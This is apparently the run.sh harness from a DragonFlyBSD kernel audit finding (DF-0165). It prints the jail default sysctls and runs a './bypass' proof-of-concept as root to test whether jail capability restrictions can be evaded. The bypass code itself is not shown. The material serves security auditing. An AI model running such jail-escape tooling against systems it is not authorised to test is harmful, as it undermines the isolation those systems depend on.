DragonFlyBSD Kernel Audit
DF-0165 / run.sh
← back to finding ↓ download raw
#!/bin/sh
# DF-0165 run. Must be invoked as root on the guest.
# Creates a jail with defaults (raw_sockets=0, vfs_mount_nullfs=0, etc.),
# attaches to it, then tries the cap-gated actions.
set -e
cd "$(dirname "$0")"
# Sanity: ensure jail defaults are restrictive (the baseline state).
sysctl jail.defaults.allow_raw_sockets >/dev/null 2>&1 || true
sysctl jail.defaults.vfs_mount_nullfs  >/dev/null 2>&1 || true
echo "---- jail default policy (should all be 0): ----"
sysctl jail.defaults.allow_raw_sockets jail.defaults.vfs_mount_nullfs \
       jail.defaults.vfs_mount_tmpfs jail.defaults.vfs_mount_devfs \
       jail.defaults.vfs_mount_procfs 2>/dev/null || true
echo "---- running bypass as root (will create + enter jail): ----"
./bypass
echo "RC=$?"